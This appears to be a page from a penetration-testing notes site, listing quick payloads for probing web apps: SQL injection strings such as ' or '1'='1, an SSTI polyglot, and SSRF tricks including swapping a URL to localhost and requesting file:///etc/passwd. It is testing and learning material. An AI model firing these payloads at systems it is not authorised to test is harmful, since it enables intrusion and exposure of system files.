search

🧠Web App Attack Techniques

Good list of quick payloads to try to test for certain vulnerabilities in web applications.

hashtag
SQL Injection

Try to test for an error or maybe a 500 Internal Server Error

'
')
"
")
admin'--
' or '1'='1
' or 1=1 --

Comments
--
/*
#

hashtag
SSTI (Server Side Template Injection)

Good payload to test for different types of SSTI

${{<%[%'"}}%\.

hashtag
SSRF (Server Side Request Forgery)

Use burpsuite and check if the reqest the site makes has a url that you can modify

You can check for internal ports open with this

  • http://randomsite.com to http://127.0.0.1:8000

Also try other wrappers

  • file:///etc/passwd

PreviousWindows Exe or .net binariesNextPassword Smuggling Attack

Last updated